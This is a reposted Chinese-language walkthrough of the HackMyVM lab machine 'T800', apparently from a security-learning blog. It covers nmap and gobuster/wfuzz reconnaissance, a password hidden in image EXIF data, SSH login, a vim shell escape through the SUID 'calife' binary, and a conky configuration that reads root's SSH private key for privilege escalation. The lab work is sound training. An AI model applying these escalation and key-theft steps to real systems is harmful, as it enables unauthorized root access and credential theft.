渗透测试靶机练习 No.80 T800

admin
admin
admin
140559
文章
117
评论
2022年4月20日10:47:39评论122 views字数 2176阅读7分15秒阅读模式

渗透测试靶机练习 No.80 T800

靶机信息

下载地址:

https://hackmyvm.eu/machines/machine.php?vm=T800
网盘链接:https://pan.baidu.com/s/1OjMwuU6F1V98x2UnLz-eHA?pwd=xcvx

靶场: HackMyVm.eu

靶机名称: T800

难度: 简单

发布时间: 2021年4月8日

提示信息:

目标: user.txt和root.txt


实验环境

攻击机:VMware kali 10.0.0.3 eth0桥接互联网,eth1桥接vbox-Host-Only

靶机:Vbox linux IP自动获取 网卡host-Only


信息收集

扫描主机

扫描局域网内的靶机IP地址

sudo nmap -sP 10.0.0.1/24

渗透测试靶机练习 No.80 T800

扫描到主机地址为10.0.0.145

扫描端口

扫描靶机开放的服务端口

sudo nmap -sC -sV -p- 10.0.0.145 -oN nmap.log

渗透测试靶机练习 No.80 T800

扫描到开放80和800端口,先来看看80端口

Web渗透

渗透测试靶机练习 No.80 T800

渗透测试靶机练习 No.80 T800

访问后只有一张图片,源码中有一段注释(我是 ruut),猜测ruut是个用户账号。做个目录扫描检查敏感路径。

目录扫描

gobuster dir -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt  -u http://10.0.0.145 -x php,html,txt,zip

渗透测试靶机练习 No.80 T800

扫描到sexy目录和robots.txt文件,先来看看robots.txt

渗透测试靶机练习 No.80 T800

给了扫描到的目录和后缀,做个模糊测试枚举文件名

wfuzz -w ../../Dict/SecLists-2022.1/Discovery/Web-Content/directory-list-2.3-medium.txt --hh 169  http://10.0.0.145/sexy/FUZZ.jpeg

渗透测试靶机练习 No.80 T800

枚举出文件名,把图片下载下来看看

wget http://10.0.0.145/sexy/nudeslut.jpeg

渗透测试靶机练习 No.80 T800

看看图片内容

渗透测试靶机练习 No.80 T800

检查图片是否有隐写信息

图片隐写

exiftool nudeslut.jpeg

渗透测试靶机练习 No.80 T800

OK,信息就这么多了,目前我们拿到了疑似用户名的ruut和密码chmodxheart,尝试登录SSH(注意SSH端口是800)

ssh [email protected] -p800

渗透测试靶机练习 No.80 T800

登录成功,来找找敏感信息

cat /etc/passwd | grep bash

渗透测试靶机练习 No.80 T800

找到另一个用户superruut,继续找

find / -perm -u=s -type f 2>/dev/null

渗透测试靶机练习 No.80 T800

搜索suid文件时发现两个可疑文件,访问看看

渗透测试靶机练习 No.80 T800

conky程序不知道如何利用,calife执行时提示运行su,并且让输入密码,再来试试

/usr/bin/calife su
/usr/bin/calife ruut
/usr/bin/calife supersruut

渗透测试靶机练习 No.80 T800

渗透测试靶机练习 No.80 T800

当我加上su为参数时提示找不到su这个用户,使用ruut为参数并且输入chmodxheart为密码时密码正确,但没有任何变化,当我用superruut为参数和chmodxheart为密码时进入了vim程序。在vim中可以执行命令,来验证下。

:!/bin/bash

渗透测试靶机练习 No.80 T800

提权成功,拿到superruut权限,先来查看下flag再找找如何提权到root权限

ls
cat userflag.txt

渗透测试靶机练习 No.80 T800

拿到userflag.txt,再来看看conky这个程序,查找搜索引擎后得知这是一个图形化的linux性能监控程序。

https://www.linuxquestions.org/questions/slackware-14/is-there-any-way-to-get-conky-to-only-output-to-console-no-x-window-777770/

渗透测试靶机练习 No.80 T800

在这个页面中他告诉我如何将命令结果输出到控制台中,需要在用户目录下生成.conkyrc文件并将内容编辑进去,来验证下

渗透测试靶机练习 No.80 T800

程序报错,为此我在/etc/conky目录下找到配置文件conky.conf

渗透测试靶机练习 No.80 T800

按照配置文件中的语法修改.conkyrc,并经过多次修改拿到最终配置文件,可以直接读取/root/.ssh/id_rsa文件

.conkyrc

conky.config = {
    out_to_x = false,
    background = false,
    no_buffers = true,
    out_to_console = true,
    double_buffer = true,
    own_window = true,
    own_window_type = override,
    own_window_transparent = true,
    update_interval = 1,
    uppercase = false,
    use_spacer = 'none',
    total_run_times = 0
}


conky.text = [[
${tail /root/.ssh/id_rsa 30}
]]

执行效果

/usr/bin/conky

渗透测试靶机练习 No.80 T800

拿到root用户的id_rsa,登录SSH

vi id_rsa
chmod 600 id_rsa
ssh [email protected] -i id_rsa

渗透测试靶机练习 No.80 T800

登录成功,来找一下flag

ls
cat rootflag.txt

渗透测试靶机练习 No.80 T800

拿到rootflag.txt,游戏结束。

渗透测试靶机练习 No.80 T800

渗透测试靶机练习 No.80 T800

原文始发于微信公众号(伏波路上学安全):渗透测试靶机练习 No.80 T800

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月20日10:47:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透测试靶机练习 No.80 T800https://cn-sec.com/archives/929101.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息